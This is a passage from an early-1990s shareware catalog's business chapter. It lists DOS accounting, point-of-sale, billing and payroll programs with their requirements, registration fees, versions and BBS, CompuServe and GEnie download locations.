on CompuServe; PAG.ARC + in IBM RTC LIB 3 on GEnie. + Download size: 200k + Description: + A custom graph, report, export generating program designed to + be use with Painless Accounting or Painless Payroll. The + modules include: Graphs, Reports, Exports, and Utilities. You + can create upto six different types of graphs including bar and + pie charts. You can also create custom line reports, group on + fields and subtotaling and totaling based on these fields. The + Companion also allows for exporting data files into ASCII + format. + + Chapter 8, "Business" 194 + + + + Product: PC-AP Accounts Payable + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Registration benefits: Phone support, bonus utilities. 20% + discount on first check order from NEBS. + Version: 1.6 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first check order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple accounts payable program integrated with PC-GL. + Allows you to quickly enter vendors, enter invoices, choose + invoice for payment and print checks. Reports include check + listing, invoice listing, vendor listing, vendor activity + report and mailing labels. Allows up to 2000 vendors and 2000 + invoices/checks per month. Invoices and checks may be sorted + by any field. Maintains check book balance and posts checks to + PC-GL each month. + + Product: PC-AR Accounts Receivable + Accounts Receivable. See full description on page 207. + + Product: PC-DEAL + Needs: IBM PC, DOS 2.0 or better. + Author: KINDRED SPIRITS + Registration: $40.00 + Registration benefits: Latest version, no registration reminder + screens, notice of updates. + Version: 2.45 (06-15-91) + User benefits: Latest version, no registration reminder screens, + notice of updates. + Look for: PCDEAL.* on BBSs (call 715-435-3855 to download it at + no charge); PCDEAL.EXE in IBMAPP forum LIB 5 on CompuServe. + Download size: 160k + Description: + Intended for personal accounting and bookkeeping for a small + organization or business. It combines both simplicity and + vesitility and is designed for those who have relatively + simple bookkeeping and accounting needs. It is ideal for those + with a need to take entries from a check register and quickly + and easily generate reports which summarize income and expense, + budget comparison, or financial condition. Transactions may be + freely entered over up to twelve months. + + Chapter 8, "Business" 195 + + + + Product: PC-FOOD + Needs: IBM PC, DOS 2.1 or better. + Author: Schreck Software, 612-731-6822 + Registration: $49.00 + Registration benefits: Next significant update free, subsequent + updates for only $10.00, support through CIS or by telephone. + Version: 5.2 (09-08-91) + User benefits: Next significant update free, subsequent updates + for only $10.00, support through CIS or by telephone. + Look for: PCFOOD.ZIP on BBSs; PCFOOD.ZIP in IBMAPP forum LIB 15 + on CompuServe. + Download size: 158k + Description: + Calculates and maintains required selling prices for each menu + item based on a desired gross profit percentage and or dollar + amount. Edit portion sizes and ingredient costs and see the + effect on costs and margins. User definable ingredient + classifications such as "fresh", "frozen", "dairy", etc. User + definable menu item classifications such as "breakfast", + "lunch", "beverage", etc. Print several reports including + "Required Price Changes", "Batch Recipes", "Menu Items", and + more. + + Product: PC-GL General Ledger + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Registration benefits: Phone support, bonus utilities. + Version: 3.6 (01-01-92) + User benefits: Phone support, bonus utilities. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple general ledger program. It includes an easily + modified standard chart of accounts. The program prints an + income statement with current, year to date and prior year + percents and a three column balance sheet. Other reports + include a general ledger for current and year to date and a + number of different transaction listings. Each entry is + instantly verified. Allows up to 800 items in the chart of + accounts and up to 6000 transactions per month. + + Product: PC-PR Payroll Writing + Payroll writing. See full description on page 210. + + Chapter 8, "Business" 196 + + + + Product: PCINV Invoice Writing + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Registration benefits: Phone support, bonus utilities. 20% + discount on first forms order from NEBS. + Version: 1.1 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first forms order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple invoice writing program integrated with the PC- + AR Accounts Receivable program. Enter up to 50 lines of 42 + character invoice detail. Calculates sales tax on taxable + items. Allows multiple line descriptions which can include + costs times amount. Prints on 7 inch or 11 inch preprinted + forms or plain paper. Prints invoices as you enter them and + does not allow for batch printing or editing previous invoices. + Invoices are immediately posted to PC-AR. + + Product: Rosewood Journal + Needs: IBM PC, DOS 2.0 or better. Printer. + Author: Rosewood Software, 416-284-6119 + Registration: $38.00 + Registration benefits: Latest version is sent along with a file + to remove registration exhortations. + Version: 4.12 (01-27-92) + User benefits: Latest version is sent along with a file to remove + registration exhortations. + Look for: ROSEJ412.ZIP on BBSs; RJ412.ZIP in IBMAPP forum LIB 6 + on CompuServe. + Download size: 166k + Description: + Rosewood Journal is an Invoice Journal and complete Accounts + Receivable package written specifically for small to medium + size businesses. Journal allows easy entry of invoice data + because of its intuitive input and automatic account search. It + will generate monthly and yearly reports and aged accounts + receivable lists and statements ready for window envelopes. Up + to 2 levels of sales tax. A label maker is built in. There are + many other features designed to make sales accounting easy. + + Chapter 8, "Business" 197 + + + + Product: Takin' Care of Business! AP + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $149.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, import/export, merge, mouse + support and automated year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, import/export, merge, mouse support and + automated year-end closing. + Look for: availability unknown on BBSs; TCB-AP.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 225k + Description: + This Accounts Payable module fully integrates with other Takin' + Care of Business! modules but needs at least the files TCB.ZIP + and TCB-GL.ZIP to run. Some features include: context sensitive + help, 2000 vendors, unlimited transactions, manual/computer + printed checks, discounts, partial payments, pre/post dated + transactions, many payment options, address labels and a full + range of reports. This is one of the easiest-to-use, error-free + ways of tracking and paying your invoices. + + Product: Takin' Care of Business! AR + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $149.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, import/export, merge, mouse + support and automated year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, import/export, merge, mouse support and + automated year-end closing. + Look for: availability unknown on BBSs; TCB-AR.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 205k + Description: + This Accounts Receivable module fully integrates with other + Takin' Care of Business! modules but needs at least the files + TCB.ZIP and TCB-GL.ZIP to run. Some features include: context + sensitive help, 2000 customers, unlimited transactions, + Invoices, Statements, pre-printed or plain-paper forms, finance + charges, pre/post dated transactions, address labels and a full + range of reports. This is one of the easiest-to-use, error- + free ways to help track your customer receivables. + + Chapter 8, "Business" 198 + + + + Product: Takin' Care of Business! GL + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. File + TCB.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $69.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, graphics, import/export, merge, + mouse support and automated year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, graphics, import/export, merge, mouse + support and automated year-end closing. + Look for: availability unknown on BBSs; TCB-GL.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 190k + Description: + This General Ledger module is fully integrated with other + Takin' Care of Business! modules but needs at least the file + TCB.ZIP to run. Some features include: context sensitive help, + real-time accounting, 2000 accounts, unlimited transactions, + full range of accountant-ready reports, budgets, double entry, + pop-up windows, recurring transactions, passwords, pre/post + dated transactions and check writing using any check. + Professional accounting software for non-accountants. + + Product: Takin' Care of Business! IN + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $299.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, mouse support and automated + year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, mouse support and automated year-end + closing. + Look for: availability unknown on BBSs; TCB-IN.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 165k + Description: + This Inventory module fully integrates with other Takin' Care + of Business! modules but needs at least the files TCB.ZIP and + TCB-GL.ZIP to run. Some features include: context sensitive + help, 3000 items, unlimited transactions, services or products, + FIFO, LIFO, standard cost, specific cost, physical inventory + and a full range of reports including activity and re-order + reports. Very easy to use and is one of the easiest ways to + track your inventory. + + Chapter 8, "Business" 199 + + + + Product: Takin' Care of Business! M&C + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. File + TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $69.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, graphics, import/export, merge, + mouse support, automated year-end closing and two bonus + software utilities. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, graphics, import/export, merge, mouse + support, automated year-end closing and two bonus software + utilities. + Look for: availability unknown on BBSs; TCB.ZIP in PCVENC forum + LIB 5 (multiple files) on CompuServe. + Download size: 305k + Description: + A fully integrated, eight-module, double-entry accounting + system designed for small/medium sized businesses. Some + features include pop-up windows, menu driven, context sensitive + help, passwords, full-range of accountant-ready reports and + pre/post dated transactions. Combines the power & + sophistication of "Big Business" bookkeeping with a simple, + easy-to-use, full-featured design. + + Product: Takin' Care of Business! PR + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $139.90 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, export, mouse support and + automated year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, export, mouse support and automated + year-end closing. + Look for: availability unknown on BBSs; TCB-PR.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 255k + Description: + This Payroll module fully integrates with other Takin' Care of + Business! modules but needs at least the files TCB.ZIP and TCB- + GL.ZIP to run. Some features include: context sensitive help, + auto deduction/liability calculations, override options, + manual/computer checks, 401K plans, user-modifiable tax tables, + W-2s, 1099s, hourly/salary, weekly/biweekly/semi-monthly/ + monthly periods and a full range of reports. One of the + easiest-to-use and complete payroll programs available. + + Chapter 8, "Business" 200 + + + + Product: Takin' Care of Business! PS + Needs: IBM PC, DOS 2.0 or better. 640k RAM, hard disk. Files + TCB.ZIP and TCB-GL.ZIP. + Author: Hooper International, Inc., 719-528-8989 + Registration: $299.95 + Registration benefits: FREE unlimited technical support, latest + version, printed/bound manuals, mouse support and automated + year-end closing. + Version: 1.0C (03-01-91) + User benefits: FREE unlimited technical support, latest version, + printed/bound manuals, mouse support and automated year-end + closing. + Look for: availability unknown on BBSs; TCB-PS.ZIP in PCVENC + forum LIB 5 (multiple files) on CompuServe. + Download size: 155k + Description: + This Point Of Sale module fully integrates with other Takin' + Care of Business! modules but needs at least the files TCB.ZIP + and TCB-GL.ZIP to run. Some features include: context + sensitive help, product & service invoices, pre-printed or + plain-paper forms, pop-up account windows, pre-defined service + descriptions and multiple pricing. Integrates with the + Inventory, A/R and G/L modules (TCB-IN.ZIP, TCB-AR.ZIP and TCB- + GL.ZIP). Very easy to use. + + Product: Time is Money + A time and expense billing program. See full description on + page 208. + + Product: XPENS + Needs: IBM PC, DOS 2.0 or better. Epson or HP LaserJet printer. + Author: Richard A. Williams, 815-455-6333 + Registration: $29.00 + Registration benefits: Printed manual, master disks. + Version: 1.1 (01-10-92) + User benefits: Printed manual, master disks. + Look for: availability unknown on BBSs; XPENS1.ZIP in IBMAPP + forum LIB 5 on CompuServe; XPENS.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 47k + Description: + Designed to provide employers and employees with a quick, easy + to use expense account screen/report that will eliminate the + necessity of keeping a supply of expense report forms and doing + all the arithmetic involved in preparing the report. Because + reports are stored on disk, the employee copy of the report + becomes unnecessary. + + Chapter 8, "Business" 201 + + + + 8.1.2 Point-of-sale systems + + Product: DAYO BACK ORDERS (BO) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 2.0 (04-01-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOOE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOOE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOOE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 310k + Description: + The maintenance module for the processing of all your + customers/sales backorders. Working with DAYO POS, it + determines and manages the filling (allocation) of your + customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + Product: DAYO INVENTORY + Inventory Control and Purchase Orders. See full description on + page 213. + + Product: DAYO LITTLE POS + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Registration benefits: Multiuser, Unlimited Records, Phone + Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOPS.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 250k + Description: + A modified version of DAYO POS create to reduce memory + requirement. Useful on LANs and/or networks where memory is + usually at a premium. + + Chapter 8, "Business" 202 + + + + Product: DAYO ORDER ENTRY + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-12-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOZE.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 300k + Description: + Creates sales orders based on the DAYO Inventory, Customer, and + other DAYO databases. Orders can be printed on a standard + printer or a Hewlett Packard(tm) Laserjet compatible printer. + The order can be printed on a pre-printed form, on the Laser + printer in a special laser format, or as a standard/default + form. + + Product: DAYO POS (POINT OF SALE) + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Registration benefits: Multiuser, Unlimited records, Manual + (printed & disk), Phone Support. + Version: 3.1 (06-28-91) + User benefits: Multiuser, Unlimited records, Manual (printed & + disk), Phone Support. + Look for: DAYOPE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOPE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe; DAYOPE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + A Billing and Invoicing application for any size business. It + is the DAYO module that permits you to invoice out your + products while keeping an accurate record of all your 'sales'. + Features include: Multiuser (ie: Novell), Registers, Quote + Interface, Templates, Back Orders, Cash Drawers, Packing/ + Shipping Lists, Labels, Sales Graphs, Special Pricing, Tax + Codes, Terms Codes, Credit Limits, Passwords, MRP interface, + Multiple Prices, and many Reports. + + Product: DAYO PRICE BOOK + DAYO Special Pricing, Price Books & Lists. See full + description on page 231. + + Chapter 8, "Business" 203 + + + + Product: DAYO QUOTES + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOQE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOQE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOQE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 310k + Description: + Creates sales order quotes based on the DAYO Inventory, + Customer, and other DAYO databases. Quotes can be printed on a + standard printer or a Hewlett Packard (tm) Laserjet compatible + printer. The quote can be printed on a pre-printed form, on the + Laser printer in a special laser format, or as a standard/ + default form. DAYO Quotes is totally integrated with the DAYO + POS and/or Billing & Invoicing modules. Templates (kits or + bundles), are supported. + + Product: DAYO RENTAL POS + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Registration benefits: Multiuser, Unlimited Records, Phone + Support. + Version: 3.0 (06-26-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOPR.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 300k + Description: + A Billing and Invoicing application for any business that rents + items, equipment, or services, ie: Videos, Tapes, Furniture, + Tools, Appliances, etc. This program requires the regular DAYO + POS module for its reports and configuration settings. It is by + default a multiuser system, allowing almost unlimited numbers + of users to have the ability to simultaneously invoice using + this one program on a PC based LAN/Network. + + Chapter 8, "Business" 204 + + + + Product: DAYO RETURNS & REFUNDS + Needs: IBM PC, DOS 3.3 or better. 450K RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Registration benefits: Multiuser, Unlimited Records, Phone + Support. + Version: 2.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOP2.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 280k + Description: + A modified version of DAYO POS, but contains only the + capability of doing returns and/or refunds of invoices/items. + The invoices default to type 'Ret' (Returns of merchandise), + and are posted as negative amount (later to become Credit + Memos). + + Product: DAYO SIMPLE POS + Needs: IBM PC, DOS 3.3 or better. 520K RAM; Hard Disk; DAYO POS. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Registration benefits: Multiuser, Unlimited Records, Phone + Support. + Version: 2.0 (06-01-91) + User benefits: Multiuser, Unlimited Records, Phone Support. + Look for: DAYOP1.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 310k + Description: + A a modified version of DAYO POS that was created to exclude + the option of selecting a customer. This program is used on + CASH accounts only. Useful in grocery store type environments + (where no customer name is required). + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 193. + + Product: PCINV Invoice Writing + Invoice writing. See full description on page 195. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 196. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 197. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 197. + + Chapter 8, "Business" 205 + + + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 198. + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 198. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 199. + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full description on page 199. + + 8.1.3 Billing systems + + Product: DAYO ACCOUNTS RECEIVABLE (AR) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Registration benefits: Multiuser, Unlimited Records, Manuals + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manuals (printed & + disk), Phone Support. + Look for: DAYOAE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOAE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOAE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + The 'final chapter' to the processing and maintenance of all + your Receivables. Includes routines to handle cash receipts, + customers, invoice types, terms, taxcodes, sales persons, and + more. Many reports are included (ie: Ageing, Customer, Sales... + ). There is a routine to print Statements (ie: SMART, 90, 60, + 30 days), and another one to create and print 'non' standard + invoices (not applicable to DAYO POS). HP Laser forms are + provided as an option for Statements and Invoices. + + Chapter 8, "Business" 206 + + + + Product: DAYO BILLING & INVOICING + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOBI.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge). + Download size: 345k + Description: + Permits you to invoice your products while keeping an accurate + record of all your 'sales'. Features include: Multiuser (ie: + Novell), Registers, Quote Interface, Templates, Back Orders, + Cash Drawers, Packing/Shipping Lists, Labels, Sales Graphs, + Special Pricing, Tax Codes, Terms Codes, Credit Limits, + Passwords, MRP interface, Multiple Prices, and many Reports. + Very similar to DAYO POS, and uses the same manual. + + Product: FAST INVOICE WRITER + Needs: IBM PC, DOS 2.1 or better. Dot matrix, LaserJet, or Epson + JX-80 color printer. + Author: H&P Software, 719-561-0810 + Registration: $39.95 + Registration benefits: Printed manual and latest version. + Version: 4.91 (07-23-91) + User benefits: Printed manual and latest version. + Look for: FAST-INV (multiple files) on BBSs (call 719-561-0810 to + download it at no charge). + Download size: 285k + Description: + Calculates and prints invoices on plain 8-1/2 x 11 inch paper. + Handles discounts, deposits, P.O. numbers, clerks initials, + type of sale, and account numbers. Does both taxable and non- + taxable sales on same sheet. Included are city, state, and a + third user-definable tax. Serial numbers are automatically + incremented. Letterhead is printed at top. Can do 3-colored + invoices. MULTIFILE-XL can be used as an external customer or + parts database. Accepts foreign dates and monetary symbols. + Does summary. + + Chapter 8, "Business" 207 + + + + Product: FAST STATEMENT WRITER + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Registration benefits: Printed manual and latest program version. + Version: 4.1 (07-11-91) + User benefits: Printed manual and latest program version. + Look for: FAST-STA (multiple files) on BBSs. + Download size: 128k + Description: + Calculates and prints monthly statements in row-column format + on plain 8-1/2 x 11 inch paper. Prints your letterhead at the + top along with copy numbering. 999 sequential statements can + be printed when data files are named 'CUST.001' thru + 'CUST.999'. Supports IBM & TANDY dot matrix, or laser printers. + Prints disclosure statement. Prints sorted or numbered summary + of accounts. Full line editing is provided on string inputs. + Does all calculations. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 155. + + Product: Home Sales System + Avon(tm) Billing & Ordering program. See full description on + page 233. + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 193. + + Product: PC-AR Accounts Receivable + Needs: IBM PC, DOS 2.1 or better. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Registration benefits: Phone support, bonus utilities. 20% + discount on first forms order from NEBS. + Version: 4.1 (01-01-92) + User benefits: Phone support, bonus utilities. 20% discount on + first forms order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Description: + A fast, simple accounts receivable and sales summary program to + get the bills out. Contains many powerful features such as + auto billing, late charges, aging and alpha account numbers. + Reports include plain paper or pre printed statements, accounts + receivable ledger, charges and payments listing, sales summary + (with or without detail), customer activity report, mailing + labels and ageing report. Inactive customers may be omitted + from most reports. Up to 8000 customers and invoices per + month. + + Chapter 8, "Business" 208 + + + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 183. + + Product: Rosewood Journal + Invoice Journal and Accounts Receivable. See full description + on page 196. + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 223. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 196. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 197. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 197. + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 198. + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 198. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 199. + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full description on page 199. + + Product: Time is Money + Needs: IBM PC, DOS 2.1 or better. + Author: Custom Data Solutions + Registration: $95.00 + Registration benefits: Source code, printed manual and disks, + free support. + Version: 2.2 (07-20-91) + User benefits: Source code, printed manual and disks, free + support. + Look for: availability unknown on BBSs; TIM22.ZIP in CONSULT + forum LIB 4 on CompuServe. + Download size: 240k + Description: + A time and expense billing program that completely automates + the generation of invoices for a time or fixed fee business of + any kind. It maintains records of receivables, and will print + statements if desired. Written in the dBASE language and + compiled with the Clipper compiler. Source code is available + + Chapter 8, "Business" 209 + + + + to registered users, as is a FoxPro version. Ideal for + consultants, attorneys, accountants, and other professionals. + + Product: TimeStax + Needs: IBM PC, DOS 2.1 or better. + Author: Johnson Technologies, 408-255-4213 + Registration: $49.95 + Registration benefits: First major upgrade is free to registered + users; support via phone/fax/Compuserve. + Version: 2.5a (02-01-91) + User benefits: First major upgrade is free to registered users; + support via phone/fax/Compuserve. + Look for: TMSTAX*.ZIP on BBSs (call 317-856-2087 to download it + at no charge); TMSTAX.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 112k + Description: + The Personal Timecard Manager. A LAN-aware time management + tool for consultants, contractors, managers, office workers - + in short, anyone who has a need to know how their time is + spent. Lets you record all activity by Date, Client, Project, + and Task for any number of employees. It features 8-line + notes, an automatic activity timer, 5 levels of subtotal + reporting, popup windows, import/export utilities, and a smooth + user interface. + + Product: TimeTrac + Time & Expense tracking; TSR, Export, LANs. See full + description on page 217. + + Product: Tolman Dental Program + Dental Office Managment Program. See full description on + page 224. + + 8.1.4 Purchase order systems + + Product: Painless Accounting + Full feature 11 module accounting system! See full description + on page 193. + + Product: The Retailer + A multi-center inventory control system. See full description + on page 215. + + Chapter 8, "Business" 210 + + + + 8.1.5 Payroll systems + + Product: DAYO PAYROLL + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOYE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOYE.ZIP in IBMAPP forum LIB 5 on CompuServe. + Download size: 320k + Description: + Provides a system for the computation of payroll for businesses + of any size. Features include: Multiuser, unlimited employees, + Weekly, BiWeekly, and/or Monthly payrolls, quarterly, year to + date (YTD), and current summary databases, Automatic payroll + posting & computation, vacation, sick pay/days, check printing, + multiple states, SDI tax, overtime & premium hourly wages, up + to 8 deductions, view reports on screen, medicare and many + reports. + + Product: Painless Acct/Payroll Companion + Custom Graph/Report/Export Program. See full description on + page 193. + + Product: Painless Payroll + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $75.00 + Registration benefits: Latest copy of the software along with a + print manual in a 3 ring binder. Also receive major discounts + on updates. + Version: 1.08 (05-27-91) + User benefits: Latest copy of the software along with a print + manual in a 3 ring binder. Also receive major discounts on + updates. + Look for: PAP*.ARC (multiple files) on BBSs (call 214-881-0313 to + download it at no charge); PAP*.ARC in IBMAPP forum LIB 5 + (multiple files) on CompuServe; PAP*.ARC in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 300k + Description: + A full feature payroll system. Modules include: Generation, + Reports, Files, and Closing. Support Federal and all 50 states + tax tables. Generates payroll for Salary, Hourly, Commissions, + and Base plus Commission. Also contains support of Allotments, + Child Support, Departmentalization. Prints numerous reports + including W2s and 1099s. Context Sensitive Help, easy + installation and automatically interfaces with Painless + Accounting 5.0. + + Chapter 8, "Business" 211 + + + + Product: PC-PR Payroll Writing + Needs: IBM PC, DOS 2.1 or better. Printer with a condensed-print + mode. + Author: Medlin Accounting Shareware, 707-255-4475 + Registration: $35.00 + Registration benefits: Phone support, current federal/state tax + tables. 20% discount on first check order from NEBS. + Version: 2.1 (02-01-92) + User benefits: Phone support, current federal/state tax tables. + 20% discount on first check order from NEBS. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP in IBMAPP forum LIB 5 on CompuServe; + MEDLIN.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 237k + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple payroll writing program. 1992 federal tax + tables and most state tax tables are included. Employees are + automatically sorted in alphabetical order. Allows up to five + deductions per check for 1000 employees. + + Reports include employee listing (can be used as payroll input + sheet), federal liability by paydate, quarterly payroll + listing, payroll ledger, payroll check listing, employee + history report and annual W-2's. Supports tips, cafeteria + plans and 401K plans. + + Product: Takin' Care of Business! AP + TCB Accounts Payable program. See full description on + page 196. + + Product: Takin' Care of Business! AR + TCB Accounts Receivable program. See full description on + page 197. + + Product: Takin' Care of Business! GL + TCB General Ledger program. See full description on page 197. + + Product: Takin' Care of Business! IN + TCB Inventory program. See full description on page 198. + + Product: Takin' Care of Business! M&C + TCB Main and Configuration programs. See full description on + page 198. + + Product: Takin' Care of Business! PR + TCB Payroll program. See full description on page 199. + + Product: Takin' Care of Business! PS + TCB Point Of Sale program. See full 